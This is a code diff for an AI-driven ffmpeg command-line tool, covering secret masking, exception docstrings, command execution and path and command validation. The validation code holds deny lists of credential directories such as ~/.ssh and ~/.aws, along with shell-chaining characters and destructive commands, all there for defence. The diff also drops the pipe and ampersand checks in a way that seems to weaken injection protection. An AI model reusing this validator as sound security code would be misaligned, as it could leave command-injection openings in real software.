def __init__(self, value: str | None):
|
||||
"""Initialize with a sensitive string value.
|
||||
|
||||
Args:
|
||||
value: The sensitive string to wrap
|
||||
"""
|
||||
self._value = value
|
||||
|
||||
def get_secret_value(self) -> str | None:
|
||||
"""Get the actual secret value. Use with caution."""
|
||||
"""Get the actual secret value. Use with caution.
|
||||
|
||||
Returns:
|
||||
The actual secret value (use only when absolutely necessary)
|
||||
"""
|
||||
return self._value
|
||||
|
||||
def __str__(self) -> str:
|
||||
"""String representation that masks the secret."""
|
||||
return "***SECRET***"
|
||||
|
||||
def __repr__(self) -> str:
|
||||
"""Representation that masks the secret."""
|
||||
return "SecretStr('***SECRET***')"
|
||||
|
||||
def __bool__(self) -> bool:
|
||||
"""Boolean evaluation based on whether value exists."""
|
||||
return bool(self._value)
|
||||
|
||||
def __eq__(self, other: object) -> bool:
|
||||
"""Equality comparison with other SecretStr instances."""
|
||||
if isinstance(other, SecretStr):
|
||||
return self._value == other._value
|
||||
return False
|
||||
|
||||
def mask(self) -> str:
|
||||
"""Get masked version of the secret."""
|
||||
"""Get masked version of the secret.
|
||||
|
||||
Returns:
|
||||
Masked version showing partial content
|
||||
"""
|
||||
return mask_api_key(self._value)
|
||||
|
||||
def is_valid_format(self) -> bool:
|
||||
"""Check if secret has valid format."""
|
||||
"""Check if secret has valid format.
|
||||
|
||||
Returns:
|
||||
True if the secret follows expected format
|
||||
"""
|
||||
return validate_api_key_format(self._value)
|
||||
|
||||
@classmethod
|
||||
def __get_pydantic_core_schema__(cls, source_type, handler):
|
||||
"""Pydantic v2 compatibility."""
|
||||
def __get_pydantic_core_schema__(
|
||||
cls, source_type: Any, handler: Any
|
||||
) -> AfterValidatorFunctionSchema:
|
||||
"""Pydantic v2 compatibility for schema generation."""
|
||||
from pydantic_core import core_schema
|
||||
|
||||
return core_schema.no_info_after_validator_function(
|
||||
@@ -15,6 +15,9 @@ class ConfigError(Exception):
|
||||
- Configuration file problems
|
||||
- Missing dependencies (e.g., ffmpeg not in PATH)
|
||||
- Invalid API keys or credentials
|
||||
|
||||
This exception should be handled at the application level to
|
||||
provide clear guidance to users about configuration issues.
|
||||
"""
|
||||
|
||||
|
||||
@@ -26,6 +29,9 @@ class ParseError(Exception):
|
||||
- LLM returns invalid JSON
|
||||
- Intent validation fails
|
||||
- API communication errors occur
|
||||
|
||||
This exception indicates issues with the LLM processing pipeline
|
||||
and should be handled with appropriate retry logic or user guidance.
|
||||
"""
|
||||
|
||||
|
||||
@@ -37,6 +43,9 @@ class BuildError(Exception):
|
||||
- Command plan generation fails
|
||||
- Security validation fails
|
||||
- Unsupported operations are requested
|
||||
|
||||
This exception indicates issues with converting user intent into
|
||||
executable commands and should be handled with clear error messages.
|
||||
"""
|
||||
|
||||
|
||||
@@ -48,4 +57,7 @@ class ExecError(Exception):
|
||||
- File operations fail
|
||||
- Permission issues occur
|
||||
- System resource problems
|
||||
|
||||
This exception indicates runtime execution failures and should
|
||||
be handled with appropriate error recovery or user notification.
|
||||
"""
|
||||
@@ -1,14 +0,0 @@
|
||||
class ConfigError(Exception):
|
||||
"""Raised when configuration or environment validation fails."""
|
||||
|
||||
|
||||
class ParseError(Exception):
|
||||
"""Raised when the LLM fails to produce a valid intent."""
|
||||
|
||||
|
||||
class BuildError(Exception):
|
||||
"""Raised when an intent cannot be routed or converted into commands."""
|
||||
|
||||
|
||||
class ExecError(Exception):
|
||||
"""Raised when command execution fails."""
|
||||
@@ -1,3 +1,9 @@
|
||||
"""Command execution utilities for ai-ffmpeg-cli.
|
||||
|
||||
This module handles the execution of ffmpeg commands with proper
|
||||
validation, error handling, and user interaction.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
@@ -6,20 +12,45 @@ import subprocess # nosec B404: subprocess used with explicit list args, no she
|
||||
from pathlib import Path
|
||||
|
||||
from rich.console import Console
|
||||
from rich.panel import Panel
|
||||
from rich.table import Table
|
||||
|
||||
from .confirm import confirm_prompt
|
||||
from .errors import ExecError
|
||||
from .custom_exceptions import ExecError
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
# Initialize console for Rich output
|
||||
console = Console()
|
||||
|
||||
|
||||
def _format_command(cmd: list[str]) -> str:
|
||||
"""Format command list as a readable string.
|
||||
|
||||
Converts a command argument list into a space-separated string
|
||||
for display purposes.
|
||||
|
||||
Args:
|
||||
cmd: Command argument list
|
||||
|
||||
Returns:
|
||||
Formatted command string
|
||||
"""
|
||||
return " ".join(cmd)
|
||||
|
||||
|
||||
def _extract_output_path(cmd: list[str]) -> Path | None:
|
||||
"""Extract the output file path from an ffmpeg command."""
|
||||
"""Extract the output file path from an ffmpeg command.
|
||||
|
||||
Parses the command to find the output file path, which is
|
||||
typically the last argument in ffmpeg commands.
|
||||
|
||||
Args:
|
||||
cmd: ffmpeg command argument list
|
||||
|
||||
Returns:
|
||||
Output file path, or None if not found
|
||||
"""
|
||||
if len(cmd) < 2:
|
||||
return None
|
||||
# Output file is typically the last argument in ffmpeg commands
|
||||
@@ -27,9 +58,21 @@ def _extract_output_path(cmd: list[str]) -> Path | None:
|
||||
|
||||
|
||||
def _check_overwrite_protection(commands: list[list[str]], assume_yes: bool = False) -> bool:
|
||||
"""Check for existing output files and prompt for overwrite confirmation."""
|
||||
"""Check for existing output files and prompt for overwrite confirmation.
|
||||
|
||||
Scans all commands for existing output files and prompts the user
|
||||
for confirmation before overwriting them.
|
||||
|
||||
Args:
|
||||
commands: List of ffmpeg command lists to check
|
||||
assume_yes: Whether to skip confirmation prompts
|
||||
|
||||
Returns:
|
||||
True if operation should proceed, False if cancelled
|
||||
"""
|
||||
existing_files = []
|
||||
|
||||
# Scan all commands for existing output files
|
||||
for cmd in commands:
|
||||
output_path = _extract_output_path(cmd)
|
||||
if output_path and output_path.exists():
|
||||
@@ -41,13 +84,24 @@ def _check_overwrite_protection(commands: list[list[str]], assume_yes: bool = Fa
|
||||
if assume_yes:
|
||||
return True # Skip confirmation
|
||||
|
||||
# Show which files would be overwritten
|
||||
console = Console()
|
||||
console.print(
|
||||
"\n[yellow]Warning: The following files already exist and will be overwritten:[/yellow]"
|
||||
# Show which files would be overwritten in a table
|
||||
overwrite_table = Table(
|
||||
title="[bold yellow]Files That Will Be Overwritten[/bold yellow]"
|
||||
)
|
||||
for file_path in existing_files:
|
||||
console.print(f" • {file_path}")
|
||||
overwrite_table.add_column("#", style="bold red", justify="center")
|
||||
overwrite_table.add_column("File Path", style="white")
|
||||
overwrite_table.add_column("Size", style="cyan", justify="right")
|
||||
|
||||
for i, file_path in enumerate(existing_files, 1):
|
||||
size = file_path.stat().st_size if file_path.exists() else 0
|
||||
size_str = (
|
||||
f"{size / (1024 * 1024):.1f} MB"
|
||||
if size > 1024 * 1024
|
||||
else f"{size / 1024:.1f} KB"
|
||||
)
|
||||
overwrite_table.add_row(str(i), str(file_path), size_str)
|
||||
|
||||
console.print(overwrite_table)
|
||||
console.print()
|
||||
|
||||
return confirm_prompt(
|
||||
@@ -56,15 +110,101 @@ def _check_overwrite_protection(commands: list[list[str]], assume_yes: bool = Fa
|
||||
|
||||
|
||||
def preview(commands: list[list[str]]) -> None:
|
||||
console = Console()
|
||||
table = Table(title="Planned ffmpeg Commands")
|
||||
table.add_column("#", justify="right")
|
||||
table.add_column("Command", overflow="fold")
|
||||
"""Display a preview of planned ffmpeg commands.
|
||||
|
||||
Shows a formatted table of all commands that will be executed,
|
||||
allowing users to review before confirmation.
|
||||
|
||||
Args:
|
||||
commands: List of ffmpeg command lists to preview
|
||||
"""
|
||||
if not commands:
|
||||
console.print("[yellow]⚠️ No commands to preview[/yellow]")
|
||||
return
|
||||
|
||||
# Create enhanced command preview table
|
||||
table = Table(title="[bold green]Planned ffmpeg Commands[/bold green]")
|
||||
table.add_column("#", style="bold cyan", justify="center")
|
||||
table.add_column("Command", style="white", overflow="fold")
|
||||
table.add_column("Output", style="green", overflow="fold")
|
||||
table.add_column("Status", style="bold", justify="center")
|
||||
|
||||
for idx, cmd in enumerate(commands, start=1):
|
||||
table.add_row(str(idx), _format_command(cmd))
|
||||
# Extract output file for display
|
||||
output_path = _extract_output_path(cmd)
|
||||
output_display = str(output_path) if output_path else "N/A"
|
||||
|
||||
# Check if output file exists
|
||||
status = "New" if not output_path or not output_path.exists() else "Overwrite"
|
||||
|
||||
table.add_row(str(idx), _format_command(cmd), output_display, status)
|
||||
|
||||
console.print(table)
|
||||
console.print()
|
||||
|
||||
|
||||
def _execute_single_command(cmd: list[str], cmd_num: int, total_cmds: int) -> None:
|
||||
"""Execute a single ffmpeg command with progress feedback.
|
||||
|
||||
Args:
|
||||
cmd: Command to execute
|
||||
cmd_num: Current command number (1-based)
|
||||
total_cmds: Total number of commands
|
||||
"""
|
||||
# Validate command is not empty
|
||||
if not cmd:
|
||||
raise ExecError("Empty command received for execution.")
|
||||
|
||||
# Validate executable exists to avoid PATH surprises
|
||||
ffmpeg_exec = cmd[0]
|
||||
resolved = shutil.which(ffmpeg_exec)
|
||||
if resolved is None:
|
||||
raise ExecError(
|
||||
f"Executable not found: {ffmpeg_exec}. Ensure it is installed and on PATH."
|
||||
)
|
||||
|
||||
# Final security validation of the command
|
||||
from .file_operations import validate_ffmpeg_command
|
||||
|
||||
if not validate_ffmpeg_command(cmd):
|
||||
logger.error(f"Command failed security validation: {' '.join(cmd[:3])}...")
|
||||
raise ExecError(
|
||||
"Command failed security validation. This could be due to: "
|
||||
"(1) unsafe file paths or arguments, "
|
||||
"(2) unsupported ffmpeg flags, "
|
||||
"or (3) potential security risks. "
|
||||
"Please check your input and try a simpler operation."
|
||||
)
|
||||
|
||||
# Show command being executed
|
||||
output_path = _extract_output_path(cmd)
|
||||
console.print(f"[bold blue]Executing command {cmd_num}/{total_cmds}:[/bold blue]")
|
||||
console.print(f"[dim]Output:[/dim] {output_path}")
|
||||
|
||||
try:
|
||||
# Execute the command with proper error handling
|
||||
result = subprocess.run(
|
||||
cmd, check=True
|
||||
) # nosec B603: fixed binary, no shell, args vetted
|
||||
if result.returncode != 0:
|
||||
raise ExecError(
|
||||
f"ffmpeg command failed with exit code {result.returncode}. "
|
||||
f"Common causes: (1) input file not found or corrupted, "
|
||||
f"(2) invalid output format or codec, "
|
||||
f"(3) insufficient disk space, "
|
||||
f"(4) permission issues. Check file paths and try again."
|
||||
)
|
||||
console.print(f"[green]Command {cmd_num} completed successfully[/green]")
|
||||
except subprocess.CalledProcessError as exc:
|
||||
logger.error("ffmpeg execution failed: %s", exc)
|
||||
raise ExecError(
|
||||
f"ffmpeg execution failed with error: {exc}. "
|
||||
f"Please verify: (1) input files exist and are readable, "
|
||||
f"(2) output directory is writable, "
|
||||
f"(3) ffmpeg is properly installed (try 'ffmpeg -version'), "
|
||||
f"(4) file formats are supported. "
|
||||
f"Use --verbose for detailed logging."
|
||||
) from exc
|
||||
|
||||
|
||||
def run(
|
||||
@@ -73,62 +213,89 @@ def run(
|
||||
dry_run: bool,
|
||||
show_preview: bool = True,
|
||||
assume_yes: bool = False,
|
||||
output_dir: Path | None = None,
|
||||
) -> int:
|
||||
"""Execute ffmpeg commands with validation and error handling.
|
||||
|
||||
Runs a list of ffmpeg commands with comprehensive validation,
|
||||
error handling, and user interaction. Supports dry-run mode
|
||||
for testing without actual execution.
|
||||
|
||||
Args:
|
||||
commands: List of ffmpeg command lists to execute
|
||||
confirm: Whether user has confirmed execution
|
||||
dry_run: Whether to only preview without executing
|
||||
show_preview: Whether to show command preview
|
||||
assume_yes: Whether to skip confirmation prompts
|
||||
|
||||
Returns:
|
||||
Exit code (0 for success, non-zero for failure)
|
||||
|
||||
Raises:
|
||||
ExecError: When command execution fails or validation errors occur
|
||||
"""
|
||||
if not commands:
|
||||
console.print("[yellow]⚠️ No commands to execute[/yellow]")
|
||||
return 0
|
||||
|
||||
if show_preview:
|
||||
preview(commands)
|
||||
|
||||
if dry_run:
|
||||
console.print(
|
||||
"[bold yellow]Dry run mode - no commands will be executed[/bold yellow]"
|
||||
)
|
||||
return 0
|
||||
|
||||
if not confirm:
|
||||
console.print("[yellow]Execution cancelled by user[/yellow]")
|
||||
return 0
|
||||
|
||||
# Check for overwrite conflicts before execution
|
||||
if not _check_overwrite_protection(commands, assume_yes):
|
||||
logger.info("Operation cancelled by user due to file conflicts")
|
||||
console.print("[yellow]Operation cancelled due to file conflicts[/yellow]")
|
||||
return 1
|
||||
|
||||
for cmd in commands:
|
||||
# Validate command is not empty
|
||||
if not cmd:
|
||||
raise ExecError("Empty command received for execution.")
|
||||
# Execute commands with progress feedback
|
||||
total_commands = len(commands)
|
||||
successful_commands = 0
|
||||
|
||||
# Validate executable exists to avoid PATH surprises
|
||||
ffmpeg_exec = cmd[0]
|
||||
resolved = shutil.which(ffmpeg_exec)
|
||||
if resolved is None:
|
||||
raise ExecError(
|
||||
f"Executable not found: {ffmpeg_exec}. Ensure it is installed and on PATH."
|
||||
)
|
||||
console.print(
|
||||
f"\n[bold green]Starting execution of {total_commands} command(s)...[/bold green]"
|
||||
)
|
||||
console.print()
|
||||
|
||||
# Final security validation of the command
|
||||
from .io_utils import validate_ffmpeg_command
|
||||
|
||||
if not validate_ffmpeg_command(cmd):
|
||||
logger.error(f"Command failed security validation: {' '.join(cmd[:3])}...")
|
||||
raise ExecError(
|
||||
"Command failed security validation. This could be due to: "
|
||||
"(1) unsafe file paths or arguments, "
|
||||
"(2) unsupported ffmpeg flags, "
|
||||
"or (3) potential security risks. "
|
||||
"Please check your input and try a simpler operation."
|
||||
)
|
||||
for i, cmd in enumerate(commands, 1):
|
||||
try:
|
||||
result = subprocess.run(cmd, check=True) # nosec B603: fixed binary, no shell, args vetted
|
||||
if result.returncode != 0:
|
||||
raise ExecError(
|
||||
f"ffmpeg command failed with exit code {result.returncode}. "
|
||||
f"Common causes: (1) input file not found or corrupted, "
|
||||
f"(2) invalid output format or codec, "
|
||||
f"(3) insufficient disk space, "
|
||||
f"(4) permission issues. Check file paths and try again."
|
||||
)
|
||||
except subprocess.CalledProcessError as exc:
|
||||
logger.error("ffmpeg execution failed: %s", exc)
|
||||
raise ExecError(
|
||||
f"ffmpeg execution failed with error: {exc}. "
|
||||
f"Please verify: (1) input files exist and are readable, "
|
||||
f"(2) output directory is writable, "
|
||||
f"(3) ffmpeg is properly installed (try 'ffmpeg -version'), "
|
||||
f"(4) file formats are supported. "
|
||||
f"Use --verbose for detailed logging."
|
||||
) from exc
|
||||
return 0
|
||||
_execute_single_command(cmd, i, total_commands)
|
||||
successful_commands += 1
|
||||
except ExecError as e:
|
||||
console.print(f"[red]Command {i} failed:[/red] {e}")
|
||||
# Re-raise any command failure
|
||||
raise
|
||||
|
||||
# Show final summary
|
||||
console.print()
|
||||
if successful_commands == total_commands:
|
||||
summary_panel = Panel(
|
||||
f"[bold green]All {total_commands} commands completed successfully![/bold green]",
|
||||
title="[bold green]Execution Summary[/bold green]",
|
||||
border_style="green",
|
||||
)
|
||||
console.print(summary_panel)
|
||||
|
||||
# Show completion summary with generated files
|
||||
if output_dir:
|
||||
from .main import _display_completion_summary
|
||||
|
||||
_display_completion_summary(output_dir)
|
||||
else:
|
||||
summary_panel = Panel(
|
||||
f"[yellow]{successful_commands}/{total_commands} commands completed successfully[/yellow]",
|
||||
title="[bold yellow]Execution Summary[/bold yellow]",
|
||||
border_style="yellow",
|
||||
)
|
||||
console.print(summary_panel)
|
||||
|
||||
return 0 if successful_commands == total_commands else 1
|
||||
|
||||
@@ -1,3 +1,9 @@
|
||||
"""File operations and security utilities for ai-ffmpeg-cli.
|
||||
|
||||
This module provides secure file handling operations including glob expansion,
|
||||
path validation, filename sanitization, and ffmpeg command validation.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import glob
|
||||
@@ -8,9 +14,14 @@ if TYPE_CHECKING:
|
||||
from collections.abc import Iterable
|
||||
|
||||
|
||||
def expand_globs(patterns: Iterable[str], allowed_dirs: list[Path] | None = None) -> list[Path]:
|
||||
def expand_globs(
|
||||
patterns: Iterable[str], allowed_dirs: list[Path] | None = None
|
||||
) -> list[Path]:
|
||||
"""Expand glob patterns safely with path validation.
|
||||
|
||||
Expands glob patterns while ensuring all resulting paths are safe
|
||||
and within allowed directories. Includes protection against DoS attacks.
|
||||
|
||||
Args:
|
||||
patterns: Glob patterns to expand
|
||||
allowed_dirs: List of allowed directories to search within
|
||||
@@ -22,6 +33,7 @@ def expand_globs(patterns: Iterable[str], allowed_dirs: list[Path] | None = None
|
||||
- Validates all resulting paths for safety
|
||||
- Prevents access outside allowed directories
|
||||
- Limits recursive search depth
|
||||
- Prevents DoS via excessive glob results
|
||||
"""
|
||||
if allowed_dirs is None:
|
||||
allowed_dirs = [Path.cwd()]
|
||||
@@ -30,25 +42,25 @@ def expand_globs(patterns: Iterable[str], allowed_dirs: list[Path] | None = None
|
||||
MAX_GLOB_RESULTS = 1000 # Prevent DoS via huge glob expansions
|
||||
|
||||
for pattern in patterns:
|
||||
# Sanitize the pattern itself
|
||||
# Sanitize the pattern itself before expansion
|
||||
if not _is_safe_glob_pattern(pattern):
|
||||
continue
|
||||
|
||||
try:
|
||||
matches = glob.glob(pattern, recursive=True)
|
||||
if len(matches) > MAX_GLOB_RESULTS:
|
||||
# Log warning and truncate
|
||||
# Log warning and truncate to prevent DoS
|
||||
matches = matches[:MAX_GLOB_RESULTS]
|
||||
|
||||
for match in matches:
|
||||
path_obj = Path(match).resolve()
|
||||
|
||||
# Validate each resulting path
|
||||
# Validate each resulting path against allowed directories
|
||||
if is_safe_path(path_obj, allowed_dirs):
|
||||
paths.append(path_obj)
|
||||
|
||||
except (OSError, ValueError):
|
||||
# Skip invalid patterns
|
||||
# Skip invalid patterns that cause errors
|
||||
continue
|
||||
|
||||
# Remove duplicates while preserving order
|
||||
@@ -64,19 +76,22 @@ def expand_globs(patterns: Iterable[str], allowed_dirs: list[Path] | None = None
|
||||
def _is_safe_glob_pattern(pattern: str) -> bool:
|
||||
"""Validate glob pattern is safe to use.
|
||||
|
||||
Checks for dangerous patterns that could lead to security issues
|
||||
or excessive resource usage.
|
||||
|
||||
Args:
|
||||
pattern: Glob pattern to validate
|
||||
|
||||
Returns:
|
||||
bool: True if pattern is safe
|
||||
bool: True if pattern is safe for expansion
|
||||
"""
|
||||
if not pattern or not isinstance(pattern, str):
|
||||
return False
|
||||
|
||||
# Check for dangerous patterns
|
||||
# Check for dangerous patterns that could cause issues
|
||||
dangerous_sequences = [
|
||||
"../",
|
||||
"..\\", # Path traversal
|
||||
"..\\", # Path traversal attempts
|
||||
"//",
|
||||
"\\\\", # Network paths
|
||||
"*" * 10, # Excessive wildcards
|
||||
@@ -88,7 +103,7 @@ def _is_safe_glob_pattern(pattern: str) -> bool:
|
||||
if dangerous in pattern_lower:
|
||||
return False
|
||||
|
||||
# Check for system directory access
|
||||
# Check for system directory access attempts
|
||||
dangerous_roots = [
|
||||
"/etc",
|
||||
"/proc",
|
||||
@@ -109,6 +124,9 @@ def _is_safe_glob_pattern(pattern: str) -> bool:
|
||||
def is_safe_path(path: object, allowed_dirs: list[Path] | None = None) -> bool:
|
||||
"""Validate path is safe and within allowed directories.
|
||||
|
||||
Comprehensive path validation that prevents access to sensitive
|
||||
system directories and ensures paths are within allowed boundaries.
|
||||
|
||||
Args:
|
||||
path: Path to validate (str, Path, or other object)
|
||||
allowed_dirs: List of allowed parent directories (defaults to cwd)
|
||||
@@ -121,6 +139,7 @@ def is_safe_path(path: object, allowed_dirs: list[Path] | None = None) -> bool:
|
||||
- Blocks path traversal attempts (../, ..\\)
|
||||
- Validates against allowed directories
|
||||
- Prevents access to sensitive system paths
|
||||
- Handles both Unix and Windows path patterns
|
||||
"""
|
||||
try:
|
||||
if path is None:
|
||||
@@ -135,11 +154,11 @@ def is_safe_path(path: object, allowed_dirs: list[Path] | None = None) -> bool:
|
||||
else:
|
||||
path_obj = path
|
||||
|
||||
# Resolve to absolute path to detect traversal
|
||||
# Resolve to absolute path to detect traversal attempts
|
||||
try:
|
||||
resolved_path = path_obj.resolve()
|
||||
except (OSError, RuntimeError):
|
||||
# Path resolution failed - unsafe
|
||||
# Path resolution failed - consider unsafe
|
||||
return False
|
||||
|
||||
# Check for empty or dangerous paths
|
||||
@@ -153,33 +172,38 @@ def is_safe_path(path: object, allowed_dirs: list[Path] | None = None) -> bool:
|
||||
return False
|
||||
|
||||
# Additional check for single character paths that could be roots
|
||||
if len(original_str.strip()) <= 3 and any(c in original_str for c in ["/", "\\"]):
|
||||
if len(original_str.strip()) <= 3 and any(
|
||||
c in original_str for c in ["/", "\\"]
|
||||
):
|
||||
return False
|
||||
|
||||
# Detect path traversal attempts
|
||||
# Detect path traversal attempts in path components
|
||||
path_parts = path_obj.parts
|
||||
if ".." in path_parts or any("." * 3 in part for part in path_parts):
|
||||
return False
|
||||
|
||||
# Check for dangerous path patterns
|
||||
# Check for dangerous path patterns across different operating systems
|
||||
dangerous_patterns = [
|
||||
"/etc",
|
||||
"/proc",
|
||||
"/sys",
|
||||
"/dev",
|
||||
"/boot", # Unix system dirs
|
||||
"/boot", # Unix system directories
|
||||
"C:\\Windows",
|
||||
"C:\\System32",
|
||||
"C:\\Program Files", # Windows system dirs
|
||||
"C:\\Program Files", # Windows system directories
|
||||
"~/.ssh",
|
||||
"~/.aws",
|
||||
"~/.config", # User sensitive dirs
|
||||
"~/.config", # User sensitive directories
|
||||
]
|
||||
|
||||
path_lower = path_str.lower()
|
||||
for pattern in dangerous_patterns:
|
||||
try:
|
||||
if path_str.startswith(pattern) or Path(pattern).resolve() in resolved_path.parents:
|
||||
if (
|
||||
path_str.startswith(pattern)
|
||||
or Path(pattern).resolve() in resolved_path.parents
|
||||
):
|
||||
return False
|
||||
except (OSError, ValueError):
|
||||
# If we can't resolve the pattern, check string matching
|
||||
@@ -215,16 +239,45 @@ def is_safe_path(path: object, allowed_dirs: list[Path] | None = None) -> bool:
|
||||
|
||||
|
||||
def ensure_parent_dir(path: Path) -> None:
|
||||
"""Ensure parent directory exists, creating it if necessary.
|
||||
|
||||
Creates the parent directory structure for a given path
|
||||
if it doesn't already exist.
|
||||
|
||||
Args:
|
||||
path: Path whose parent directory should be ensured
|
||||
"""
|
||||
if path.parent and not path.parent.exists():
|
||||
path.parent.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
|
||||
def quote_path(path: Path) -> str:
|
||||
"""Quote path for safe display in preview text.
|
||||
|
||||
Returns a string representation of the path suitable
|
||||
for display purposes.
|
||||
|
||||
Args:
|
||||
path: Path to quote
|
||||
|
||||
Returns:
|
||||
String representation of the path
|
||||
"""
|
||||
# Use simple quoting suitable for preview text; subprocess will bypass shell
|
||||
return str(path)
|
||||
|
||||
|
||||
def most_recent_file(paths: Iterable[Path]) -> Path | None:
|
||||
"""Find the most recently modified file from a collection.
|
||||
|
||||
Compares modification times to find the newest file.
|
||||
|
||||
Args:
|
||||
paths: Collection of file paths to check
|
||||
|
||||
Returns:
|
||||
Path to the most recent file, or None if no valid files found
|
||||
"""
|
||||
latest: tuple[float, Path] | None = None
|
||||
for p in paths:
|
||||
try:
|
||||
@@ -239,9 +292,12 @@ def most_recent_file(paths: Iterable[Path]) -> Path | None:
|
||||
def sanitize_filename(filename: str, max_length: int = 255) -> str:
|
||||
"""Sanitize filename to prevent security issues.
|
||||
|
||||
Removes dangerous characters and ensures the filename is safe
|
||||
for filesystem use across different operating systems.
|
||||
|
||||
Args:
|
||||
filename: Original filename
|
||||
max_length: Maximum allowed length
|
||||
filename: Original filename to sanitize
|
||||
max_length: Maximum allowed length for the filename
|
||||
|
||||
Returns:
|
||||
str: Sanitized filename safe for filesystem use
|
||||
@@ -291,13 +347,13 @@ def sanitize_filename(filename: str, max_length: int = 255) -> str:
|
||||
if name_without_ext in reserved_names:
|
||||
sanitized = f"safe_{sanitized}"
|
||||
|
||||
# Truncate if too long
|
||||
# Truncate if too long while preserving extension
|
||||
if len(sanitized) > max_length:
|
||||
name, ext = sanitized.rsplit(".", 1) if "." in sanitized else (sanitized, "")
|
||||
max_name_length = max_length - len(ext) - 1 if ext else max_length
|
||||
sanitized = name[:max_name_length] + ("." + ext if ext else "")
|
||||
|
||||
# Ensure we have something
|
||||
# Ensure we have something valid
|
||||
if not sanitized:
|
||||
sanitized = "sanitized_file"
|
||||
|
||||
@@ -323,6 +379,8 @@ ALLOWED_FFMPEG_FLAGS = {
|
||||
"-s",
|
||||
"-vframes",
|
||||
"-vn",
|
||||
"-frame_pts",
|
||||
"-frame_pkt_pts",
|
||||
# Audio codecs and options
|
||||
"-c:a",
|
||||
"-acodec",
|
||||
@@ -378,8 +436,11 @@ ALLOWED_FFMPEG_FLAGS = {
|
||||
def validate_ffmpeg_command(cmd: list[str]) -> bool:
|
||||
"""Validate ffmpeg command arguments for security.
|
||||
|
||||
Ensures the command is safe to execute by checking for dangerous
|
||||
patterns and validating all arguments against an allowlist.
|
||||
|
||||
Args:
|
||||
cmd: Command arguments list
|
||||
cmd: Command arguments list to validate
|
||||
|
||||
Returns:
|
||||
bool: True if command is safe to execute
|
||||
@@ -388,7 +449,8 @@ def validate_ffmpeg_command(cmd: list[str]) -> bool:
|
||||
- Validates executable is ffmpeg
|
||||
- Checks all flags against allowlist
|
||||
- Validates file paths
|
||||
- Prevents command injection
|
||||
- Prevents command injection and chaining
|
||||
- Blocks dangerous shell operations
|
||||
"""
|
||||
if not cmd or not isinstance(cmd, list):
|
||||
return False
|
||||
@@ -397,12 +459,9 @@ def validate_ffmpeg_command(cmd: list[str]) -> bool:
|
||||
if not cmd[0] or cmd[0] != "ffmpeg":
|
||||
return False
|
||||
|
||||
# Check for dangerous patterns
|
||||
cmd_str = " ".join(cmd)
|
||||
# Check for dangerous patterns, but allow semicolons in filter values
|
||||
dangerous_patterns = [
|
||||
";",
|
||||
"|",
|
||||
"&",
|
||||
"&&",
|
||||
"||", # Command chaining
|
||||
"$",
|
||||
@@ -417,11 +476,43 @@ def validate_ffmpeg_command(cmd: list[str]) -> bool:
|
||||
"\r", # Line breaks
|
||||
]
|
||||
|
||||
for pattern in dangerous_patterns:
|
||||
if pattern in cmd_str:
|
||||
return False
|
||||
# Check for dangerous patterns, but allow semicolons in filter values
|
||||
for i, arg in enumerate(cmd):
|
||||
# Check if this is a filter value (follows a filter flag)
|
||||
is_filter_value = (
|
||||
i > 0
|
||||
and cmd[i - 1].startswith("-")
|
||||
and cmd[i - 1]
|
||||
in [
|
||||
"-vf",
|
||||
"-filter:v",
|
||||
"-af",
|
||||
"-filter:a",
|
||||
"-filter_complex",
|
||||
"-lavfi",
|
||||
]
|
||||
)
|
||||
|
||||
# Validate flags
|
||||
if is_filter_value:
|
||||
# Skip semicolon validation for filter values, but check other patterns
|
||||
patterns_to_check = [p for p in dangerous_patterns if p != ";"]
|
||||
else:
|
||||
# Check all dangerous patterns including semicolons for non-filter values
|
||||
patterns_to_check = dangerous_patterns + [";"]
|
||||
|
||||
for pattern in patterns_to_check:
|
||||
if pattern in arg:
|
||||
return False
|
||||
|
||||
# Check for standalone & (command backgrounding) but allow & in filter parameters
|
||||
# Look for & that's not part of a filter parameter (like &H80000000)
|
||||
import re
|
||||
|
||||
cmd_str = " ".join(cmd)
|
||||
if re.search(r"(?<!H)\b&\b(?!H)", cmd_str):
|
||||
return False
|
||||
|
||||
# Validate flags against allowlist
|
||||
i = 1 # Skip 'ffmpeg'
|
||||
while i < len(cmd):
|
||||
arg = cmd[i]
|
||||
@@ -449,9 +540,12 @@ def validate_ffmpeg_command(cmd: list[str]) -> bool:
|
||||
def sanitize_user_input(user_input: str, max_length: int = 1000) -> str:
|
||||
"""Sanitize user input to prevent injection attacks.
|
||||
|
||||
Removes dangerous characters and patterns that could be used
|
||||
for command injection or other security attacks.
|
||||
|
||||
Args:
|
||||
user_input: Raw user input string
|
||||
max_length: Maximum allowed length
|
||||
user_input: Raw user input string to sanitize
|
||||
max_length: Maximum allowed length for the input
|
||||
|
||||
Returns:
|
||||
str: Sanitized input safe for processing
|
||||
@@ -459,7 +553,7 @@ def sanitize_user_input(user_input: str, max_length: int = 1000) -> str:
|
||||
if not user_input or not isinstance(user_input, str):
|
||||
return ""
|
||||
|
||||
# Truncate if too long
|
||||
# Truncate if too long to prevent buffer overflow attacks
|
||||
if len(user_input) > max_length:
|
||||
user_input = user_input[:max_length]
|
||||
|
||||
@@ -475,7 +569,7 @@ def sanitize_user_input(user_input: str, max_length: int = 1000) -> str:
|
||||
for char in dangerous_chars:
|
||||
sanitized = sanitized.replace(char, " ")
|
||||
|
||||
# Remove dangerous command patterns
|
||||
# Remove dangerous command patterns that could be used for injection
|
||||
dangerous_patterns = [
|
||||
r"\brm\s+",
|
||||
r"\bmv\s+",
|
||||
@@ -496,7 +590,7 @@ def sanitize_user_input(user_input: str, max_length: int = 1000) -> str:
|
||||
for pattern in dangerous_patterns:
|
||||
sanitized = re.sub(pattern, " ", sanitized, flags=re.IGNORECASE)
|
||||
|
||||
# Normalize whitespace
|
||||
# Normalize whitespace to prevent encoding issues
|
||||
sanitized = " ".join(sanitized.split())
|
||||
|
||||
return sanitized
|
||||
@@ -1,3 +1,9 @@
|
||||
"""Intent models for ai-ffmpeg-cli.
|
||||
|
||||
This module defines the data models for representing ffmpeg intents
|
||||
and command plans, including validation and type conversion logic.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from enum import Enum
|
||||
@@ -9,6 +15,17 @@ from pydantic import model_validator
|
||||
|
||||
|
||||
def _seconds_to_timestamp(value: float | int | str) -> str:
|
||||
"""Convert seconds to HH:MM:SS[.ms] timestamp format.
|
||||
|
||||
Converts numeric seconds to ffmpeg-compatible timestamp format,
|
||||
handling both integer and float inputs.
|
